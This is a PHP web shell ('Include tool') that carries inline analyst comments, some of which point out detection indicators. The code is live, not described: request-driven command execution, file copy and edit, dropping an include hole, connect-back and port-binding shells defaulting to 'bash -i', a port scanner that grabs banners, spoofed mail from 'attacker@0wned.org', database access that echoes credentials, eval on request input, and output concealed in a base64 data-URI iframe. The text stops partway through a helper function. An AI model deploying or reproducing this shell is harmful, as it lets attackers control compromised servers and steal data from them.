<?php
######################################################################
# we decide if we want syslogging
# Analyst note: this include is a PHP web shell. Every feature below is
# gated on a request parameter of the same name (see $ArrFuncs); that
# works because import_globals() promotes request parameters to globals.
# closelog() only closes an already-open syslog connection; the openlog()
# call further down is commented out, so no logging ever happens here.
closelog();
######################################################################
# define variables
######################################################################

# error_reporting(E_ALL);
# All warnings/notices are silenced, so failing tools show up as empty
# table cells rather than visible errors.
error_reporting(0);

# get globals even if register_globals is off
# Defined at the bottom of this file; fills $REQUESTS, $QUERY_STRING,
# $SCRIPT_FILENAME, $SERVER_NAME, ... and copies GET/POST/cookie
# parameters into the global scope.
import_globals();

# Server configuration read for the banner labels ($SM/$RG/$MQ);
# $magic_quotes_gpc is also consulted by edit_file() before writing.
$safe_mode = ini_get('safe_mode');
$register_globals = ini_get('register_globals');
$magic_quotes_gpc = ini_get('magic_quotes_gpc');
# on/off labels; only 'en' is ever used because $lang is hard-coded.
$txt['en']['on']="on";
$txt['en']['off']="off";
$txt['de']['on']="an";
$txt['de']['off']="aus";
$lang="en";

if($safe_mode == 1) $SM = $txt[$lang]['on'];
else {
$SM = $txt[$lang]['off'];
# set_time_limit(9000);
}
if($register_globals == 1) $RG = $txt[$lang]['on'];
else $RG = $txt[$lang]['off'];
if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
else $MQ = $txt[$lang]['off'];
|
|
|
|
# navigatable functions
# Feature toggles. Each key is both a request parameter name and a section
# switch in the output code; 0 means the section is hidden.
$ArrFuncs = array(
"dropinc" => 0,
"filecopy" => 0,
"fileedit" => 0,
"showsource" => 0,
"snoop" => 0,
"cmdln" => 0,
"connectback" => 0,
"phpshell" => 0,
"servicecheck" => 0,
"mysqlaccess" => 0,
"mail" => 0,
"env" => 0,
"phpenv" => 0,
"phpinfo" => 0,
"dumpvars" => 0,
"debugscript" => 0,
"syslog" => 0
);

# init navigation
# Variable-variables: $$key is created only when the request (after
# import_globals()) did not already supply a global of that name.
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;

# set default values
# Form-field defaults, same override pattern as above. 'vsource' defaults
# to this script's own path, 'cbhost' to the requesting client's address,
# and 'cbport'/'phpshellport' share the constant 20202 — fixed values that
# are useful when writing detection rules for this shell.
$ArrDefaults = array(
"filecopy_source" => "http://...",
"filecopy_dest" => getcwd(),
"cmdcall" => "",
"editfile" => getcwd(),
"editcontent" => "",
"chdir" => ".",
"vsource" => $SCRIPT_FILENAME,
"mail_from" => "attacker@0wned.org",
"mail_to" => "",
"mail_subject" => "",
"mail_attach_source" => "http://....",
"mail_attach_appear" => "filename...",
"mail_content_type" => "image/png",
"mail_msg" => "",
"tcpports" => "21 22 23 25 80 110",
"timeout" => 5,
"miniinc_loc" => getcwd() . "/miniinc.php",
"incdbhost" => "localhost",
"cbhost" => $_SERVER['REMOTE_ADDR'],
"cbport" => 20202,
"cbtempdir" => "/tmp",
"cbcompiler" => "gcc",
"phpshellapp" => "export TERM=xterm; bash -i",
"phpshellhost" => "0.0.0.0",
"phpshellport" => "20202"
);

# init defaults
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;

# define executable functions
# Display labels indexed by the method number returned by test_cmd_shell()
# and accepted by Mexec(); 0 = nothing usable.
$Mstr = array(
0 => "No execute functions available!",
1 => "passthru()",
2 => "system()",
3 => "backticks",
4 => "proc_open()",
5 => "exec()"
);
|
|
|
|
# clean request to avoid uri monster
# Rebuilds the query string ($SREQ) that every form action and toggle link
# appends to $MyLoc so the current state survives navigation. $REQUESTS is
# populated by import_globals().
$SREQ = "";
$reqdat = array();
$tmpCount=0;
foreach($REQUESTS as $key => $val){
# The first parameter is always kept. For the rest, the three OR'd
# inequalities are satisfied by nearly every value (all three would have
# to fail), so this "cleaning" drops almost nothing.
if($tmpCount==0) $reqdat[] = $key."=".$val;
else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
$tmpCount++;
}
$SREQ = implode("&", $reqdat);
$tmpCount=0;
# Fallback: parse $QUERY_STRING by hand when $REQUESTS produced nothing.
# Assumes every segment contains '='; a bare key leaves $tmp_val[1]
# undefined (the notice is hidden by error_reporting(0)).
if($SREQ=="") {
$tmp_req = array();
$tmp_qry = explode("&", $QUERY_STRING);
foreach($tmp_qry as $key => $val) {
$tmp_val = explode("=", $val);
if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
$tmpCount++;
}
$SREQ = implode("&", $tmp_req);
}

# Extra parameter carried through verbatim (not in $ArrDefaults).
if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];

# set some defaults to avaoid errors
# Globals filled by snoopy(); $emeth is the exec-method index (0 = none).
$is_file = array();
$is_dir = array();
$is_w_dir = array();
$is_w_file = array();
$emeth=0;
# Normalise the browsing path: 0/1-char values other than "/" fall back
# to the cwd, "//" is collapsed once, and a trailing slash is guaranteed.
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
$chdir = str_replace("//", "/", $chdir);
if(substr($chdir, -1) != "/") $chdir .= "/";
##
# Setup wether to use PHP_SELF or SCRIPT_NAME
# $SCRIPT_NAME and $SERVER_PORT are not set by import_globals(); they rely
# on register_globals being on (or on the request supplying them).
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
else $MyLoc = $SCRIPT_NAME;

# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
# Absolute base URL for all forms/links; the scheme is hard-coded to http.
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;
|
|
|
|
# This is a list of internal inc.inc vars that do not get displayed
# inside the dumpvars function (poss for a debug func later?)
# dd() tests array_search() for truthiness, so a name stored at index 0
# would never be treated as found; the nonsense first entry apparently
# exists to occupy index 0 so every real name sits at a truthy index.
$DebugArr = array(
'ARHGFDGFGASDFG',
'safe_mode',
'register_globals',
'magic_quotes_gpc',
'txt',
'lang',
'SM',
'RG',
'MQ',
'ArrFuncs',
'val',
'key',
'env',
'phpenv',
'phpinfo',
'debugscript',
'filecopy',
'fileedit',
'showsource',
'snoop',
'mail',
'cmdln',
'syslog',
'servicecheck',
'dropinc',
'mysqlaccess',
'ArrDefaults',
'filecopy_source',
'filecopy_dest',
'cmdcall',
'editfile',
'editcontent',
'chdir',
'vsource',
'mail_from',
'mail_to',
'mail_subject',
'mail_attach_source',
'mail_attach_appear',
'mail_content_type',
'mail_msg',
'tcpports',
'timeout',
'miniinc_loc',
'incdbhost',
'Mstr',
'SREQ',
'reqdat',
'tmpCount',
'is_file',
'is_dir',
'is_w_dir',
'is_w_file',
'emeth',
'MyLoc',
'dumpvarsare',
'DebugArr',
'cbtempdir',
'cbcompiler',
'cbhost',
'cbport',
'phpshelltype',
'phpshellapp',
'phpshellhost',
'phpshellport'
);

# activate syslog entry
# Both statements inside are commented out: nothing is ever written to
# syslog whatever $syslog holds; the toggle only changes the banner label.
if($syslog == 1)
{
# openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
# drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
}
|
|
###############################################################################
#
# start include output
#
###############################################################################
# All HTML is accumulated in $strOutput and emitted once, at the end of the
# top-level code, base64-encoded into an iframe — not echoed as it is built.
# Anything that prints directly (phpinfo, dd, system/passthru) therefore
# appears outside the shell's own page.
$strOutput = "";
$strOutput .= "<html><body bgcolor='#ffffff'>
<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
<center>
<h2>Include tool</h2>
PHP Version: " . phpversion() . " |
safe_mode: $SM |
register_globals: $RG |
magic_quotes_gpc: $MQ |
syslogging: ";
# Label is inverted relative to the flag: prints 'off' when $syslog == 1.
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
$strOutput .= "
<br><br>
</center>
<font color='#000000'>";
# One [on]/[off] toggle link per feature key, rendered by make_switch().
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key);
|
|
|
|
###############################################################################
# test cmd shell environment
###############################################################################
if($env == 1) {
# test_cmd_shell() probes which exec primitive works; "=&" here
# reference-assigns a function return (a notice, silenced). Methods 1/2
# (passthru/system) print inside Mexec(), so for them the command text
# lands outside the buffered page.
$strOutput .= "
<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
if($emeth==0) {
$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
} else {
$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
</table>";
}
}

###############################################################################
# test php environment
###############################################################################
if($phpenv == 1) {
# each() was removed in PHP 8; together with import_request_variables()
# in import_globals() this dates the script to the PHP 4/5 era.
$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
<tr><td colspan=2>posix infos</td><tr>";
if(function_exists('posix_uname')) {
$posix_uname = posix_uname();
while (list($info, $value) = each ($posix_uname)) {
$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
}
} else {
$strOutput .= "posix_uname not available";
}
$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
else $strOutput .= "posix_getuid not available";
if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
else $strOutput .= "posix_geteuid not available";
if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
else $strOutput .= "posix_getgid not available";
$strOutput .= "</table>";
}

###############################################################################
# dump variables
###############################################################################
if($dumpvars == 1) {
# dd() echoes its dump directly and returns nothing, so the concatenation
# below inserts an empty value while the dump itself is printed
# immediately, outside $strOutput.
$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
<tr><td>" . dd("GLOBALS") . "</td></tr>
</table>";
}
###############################################################################
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
# Drops out of PHP mode: this table is echoed immediately (not buffered)
# and relies on short open tags.
if($debugscript == 1) { ?>
<table border=1><tr><td><h3>debug script</h3></td></tr>
<tr><td>
<? ddb("DebugArr"); ?>
</td></tr>
</table>
<? }
|
|
###############################################################################
# copy file
###############################################################################
if($filecopy == 1) {
# copy_file() is evaluated on every render of this section with the
# current field values, so a copy is attempted even when the form is first
# opened with its defaults. This form's action attribute lacks the opening
# quote the other forms have. Field values are echoed unescaped.
$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
<tr><td>destination</td><td><input type=text name='filecopy_dest' value='" . $filecopy_dest . "'></td></tr>
<tr><td></td><td><input type=submit></td></tr>
<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
</form>
</table>";
}
###############################################################################
# edit file
###############################################################################
if($fileedit == 1) {
$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>";
# Bitwise | used as a logical OR; with 0/1 operands the result is the same.
if($edit==1 | $editfile!=$ArrDefaults['editfile'])
$strOutput .= show_file($editfile);
$strOutput .= "</textarea></td></tr>
<tr><td></td><td><input type=submit></td></tr>
<tr><td colspan=2>";
# edit_file() only writes when $edit == 1 and the target already exists.
if($edit==1 | $editfile!=$ArrDefaults['editfile'])
$strOutput .= edit_file($editcontent,$editfile,$edit);
$strOutput .= "</td></tr>
</table>
</form>";
}
###############################################################################
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($cmdln == 1) {
# Re-probes the exec method on every request (the env section does too).
$emeth = test_cmd_shell();
$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
<tr><td></td><td><input type=submit></td></tr>
<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
<tr><td colspan=2>";
# Methods 1/2 (passthru/system) print inside Mexec() instead of returning,
# hence the notice text; methods 3-5 return captured output.
if($emeth < 3) {
$strOutput .= "The output of this command will be somewhere on the page!";
Mexec($cmdcall, $emeth);
} else {
$strOutput .= Mexec($cmdcall, $emeth);
}
$strOutput .= "</td></tr>
</form>
</table>";
}
###############################################################################
# sending mime mail
###############################################################################
if($mail == 1) {
# drop_mime_mail() runs on every render; it returns a prompt string while
# message or subject is empty and only sends once both are present.
$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
<tr><td></td><td><input type=submit></td></tr>
<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
</form>
</table>";
}
|
|
|
|
###############################################################################
# drop mini inc handling
###############################################################################
if($dropinc == 1) {
# $loc and $minisave arrive straight from the request (no defaults above);
# the dropminiinc() handler is defined outside this view.
if($loc!="") $miniinc_loc = $loc;
$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
<tr><td></td><td><input type=submit></td></tr>
<tr><td colspan=2><pre>";
if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
$strOutput .= "</pre></td></tr>
</form>
</table>";
}
###############################################################################
# connect C back shell handling
###############################################################################
if($connectback == 1) {
# Reverse-connect form. The connect_back() handler is outside this view and
# is only invoked when 'run' is checked and all four fields are truthy.
# The fixed defaults (port 20202, "/tmp", "gcc") are usable indicators when
# hunting for this shell in logs or traffic.
$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
<tr><td></td><td><input type=submit></td></tr>
<tr><td colspan=2>";
if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
$strOutput .= "</td></tr></form></table>";
}

###############################################################################
# PHP shell handling
###############################################################################
if($phpshell == 1) {
# DB_Shell() is outside this view. Note the argument order: port is passed
# before host, unlike the form's field order. The default
# "export TERM=xterm; bash -i" string is another fixed indicator.
$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
<tr><td></td><td><input type=submit></td></tr>
<tr><td colspan=2>";
if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
$strOutput .= "</td></tr></form></table>";
}
|
|
|
|
|
|
###############################################################################
# snooping
###############################################################################
if($snoop == 1) {
# snoopy() (defined below; its body runs past this view) lists $chdir,
# which was normalised earlier, and fills the $is_file/$is_dir/$is_w_*
# globals. It runs on every render of this section.
$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
</form>
</table>";
}
###############################################################################
# show highlited source
###############################################################################
# Bitwise | as logical OR again. highlight_file() reads whatever path the
# request supplies; the default is this script itself. The second argument
# (1) makes it return the markup instead of echoing it.
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
<tr><td></td><td><input type=submit></td></tr>
<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
</form>
</table>";
}
|
|
###############################################################################
# service check
###############################################################################
if($servicecheck == 1) {
# $servhost is request-supplied (no default above); space-separated host
# and port lists are expanded below.
if($servhost!="") $host = $servhost;
else $host = "localhost";

$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
<tr><td></td><td><input type=submit></td></tr>
<tr><td colspan=2><pre>";

$hosts = explode(" ", $host);
$port = explode(" ",$tcpports);
$values = count($port);
$numhosts = count($hosts);
# explode() on a non-empty delimiter never returns an empty array, so
# $numhosts is always >= 1 and the "No hosts specified" branch is dead.
if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
else if($values > 1) $strOutput .= "Checking $values ports..\n";
else $strOutput .= "No ports specified!!\n";
if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
else if($numhosts == 1) $strOutput .= "On 1 host..\n";
else $strOutput .= "No hosts specified!!\n";
if($numhosts >= 1) {
for($hcount=0; $hcount < $numhosts; $hcount++) {
$tmphost = $hosts[$hcount];
$strOutput .= "\nTesting $tmphost..\n";
if(($values == 1 && $port[0] != "") | $values > 1) {
for ($cont=0; $cont < $values; $cont++) {
# Connect with the request-supplied timeout, errors suppressed; $oi/$oi2
# receive errno/errstr and are never displayed. A single fgets() reads
# the banner; isset() only rejects a null result, so an open port that
# sends nothing still yields a line with an empty banner once the read
# times out. A failed connect hands a non-resource to fgets(), whose
# behaviour differs by PHP version. Sockets are never fclose()d.
@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
$service = getservbyport($port[$cont],"tcp");
@$get = fgets($sock[$cont]);
if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
# Nothing has been echoed at this point (text goes to $strOutput), so
# flush() has nothing to push out here.
flush();
}
}
}
}
$strOutput .= "</pre></td></tr>
</form>
</table>";
}
###############################################################################
# show phpinfo
###############################################################################
if($phpinfo == 1){
# Echoed immediately, outside the buffered $strOutput page.
phpinfo();
}
|
|
######################################################################
# db stuff
######################################################################
if($mysqlaccess == 1) {
# Credentials are plain text inputs and are echoed back unescaped into
# value='...'. The 'incdbvar' checkbox is commented out, so the eval-based
# $dbh branch below is normally not reached unless the request supplies
# that parameter directly.
$strOutput .= "<table border=1>
<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
</table>";
}

# Selects which branch below runs: a non-empty $incdbvar sets $dbh (field
# values are then treated as variable *names* resolved via eval), otherwise
# $dbH (values used directly). Only host and user are required; the other
# fields are copied only when non-empty, and the branches test them with
# isset(), so e.g. $dbs stays unset for an empty query.
if($incdbhost!="" && $incdbuser!="") {
if($incdbvar!="") $dbh = $incdbhost;
else $dbH = $incdbhost;
$dbu = $incdbuser;
$dbp = $incdbpass;
if($incdbsql!="") $dbs = $incdbsql;
if($incdbname!="") $dbn = $incdbname;
if($incdbtable!="") $dbt = $incdbtable;
if($incdbfile!="") $dumpfile = $incdbfile;
}
|
|
|
|
if(isset($dbh)) {
$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
# Variable-variable lookups performed through eval() on request-derived
# text: each $db* value is interpolated as the *name* of another global.
# Because the text is request-controlled, these eval() calls are also a
# code-execution sink in their own right.
eval("\$Gdbhost = \"\$$dbh\";");
eval("\$Gdbuser = \"\$$dbu\";");
eval("\$Gdbpass = \"\$$dbp\";");
eval("\$Gdbname = \"\$$dbn\";");
$strOutput .= "<tr><td>";
# Dispatch: no db name -> list databases; sql given -> run (or dump) the
# query; table given -> list (or dump) rows; otherwise list tables. The
# display_*/dump_* handlers are outside this view; a non-empty 'incdbfile'
# routes results to a server-side path. Credentials are echoed in clear.
if($dbn=="") {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
"</td></tr><tr><td>" .
display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
} else if(isset($dbs)) {
$Gdbsql = $dbs;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql .
"</td></tr><tr><td>";
if(isset($dumpfile)) {
$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
} else {
$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
}
} else if(isset($dbt)) {
$Gdbtabl = $dbt;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
$strOutput .= "</td></tr><tr><td>";
if(isset($dumpfile)) {
$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);
} else {
$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
}
} else {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
"</td></tr><tr><td>" .
display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
}
# Closes a <pre> that this section never opened.
$strOutput .= "</pre></td></tr></table><br/>";
}

if(isset($dbH)) {
# Same dispatch as the $dbh branch above, using the request values
# directly instead of resolving them through eval().
$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
if($dbn=="") {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
"</td></tr><tr><td>".
display_dbs($dbH, $dbu, $dbp);
} else if(isset($dbs)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
"</td></tr><tr><td>";
if(isset($dumpfile)) {
$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
} else {
$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
}
} else if(isset($dbt)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
$strOutput .= "</td></tr><tr><td> ";
if(isset($dumpfile)) {
$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);
} else {
$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
}
} else {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
"</td></tr><tr><td>" .
display_tables($dbH, $dbu, $dbp, $dbn);
}
# Closes a <pre> that this section never opened.
$strOutput .= "</pre></td></tr></table><br/>";
}
|
|
|
|
# ODBC variants of the two blocks above. Neither $Odbh nor $OdbH is
# assigned anywhere in this view; they can only arrive as request-supplied
# globals. The Odisplay_* handlers are outside this view.
if(isset($Odbh)) {
$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
# Same eval()-based variable-name resolution as the $dbh branch.
eval("\$Gdbhost = \"\$$Odbh\";");
eval("\$Gdbuser = \"\$$dbu\";");
eval("\$Gdbpass = \"\$$dbp\";");
eval("\$Gdbname = \"\$$dbn\";");
$strOutput .= "<tr><td>";
if(isset($dbt)) {
$Gdbtabl = $dbt;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
"</td></tr><tr><td>" .
display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
} else {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
"</td></tr><tr><td> " .
Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
}
$strOutput .= "</pre></td></tr></table><br/>";
}

if(isset($OdbH)) {
# The labels print $dbH while the handlers receive $OdbH — inconsistent
# with the branch above; the displayed host may not be the one queried.
$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
if(isset($dbt)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
"</td></tr><tr><td> " .
Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
} else {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
"</td></tr><tr><td> " .
Odisplay_tables($OdbH, $dbu, $dbp);
}
$strOutput .= "</pre></td></tr></table><br/>";
}
|
|
|
|
|
|
$strOutput .= "</font></td></tr></table>";
# Delivery: the whole accumulated page is base64-encoded and set as the src
# of a full-window data: URI iframe. The run of ten </div> closers
# presumably breaks out of the container markup of whatever page this file
# is included into. For detection, a response body containing a run of
# </div> immediately followed by an <iframe> whose src starts with
# "data:text/html;base64," is a distinctive signature of this shell. The
# <iframe> is never closed and no </body></html> follows.
$strOutputB64 = chunk_split(base64_encode($strOutput));
echo "</div></div></div></div></div></div></div></div></div></div>\n";
echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';
|
|
|
|
######################################################################
|
|
#
|
|
# functions
|
|
#
|
|
######################################################################
|
|
# make globals avail
# Populates the globals the top-level code relies on. Where register_globals
# is off, import_request_variables('GPC') copies every GET/POST/cookie
# parameter into the global scope — this is what makes each feature toggle
# and form default settable straight from the request.
# import_request_variables() and the $HTTP_*_VARS arrays were removed in
# PHP 5.4, so this function only works as intended on PHP 4/5.
function import_globals()
{
global $HTTP_SERVER_VARS;
global $REMOTE_ADDR;
global $PHP_SELF;
global $REQUESTS;
global $SCRIPT_FILENAME;
global $QUERY_STRING;
global $SCRIPT_URI;
global $SERVER_NAME;
$_igr = ini_get('register_globals');
if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
# $REQUESTS feeds the query-string rebuild at the top of the file. Note
# that the version check is a string comparison, and $HTTP_GET_VARS /
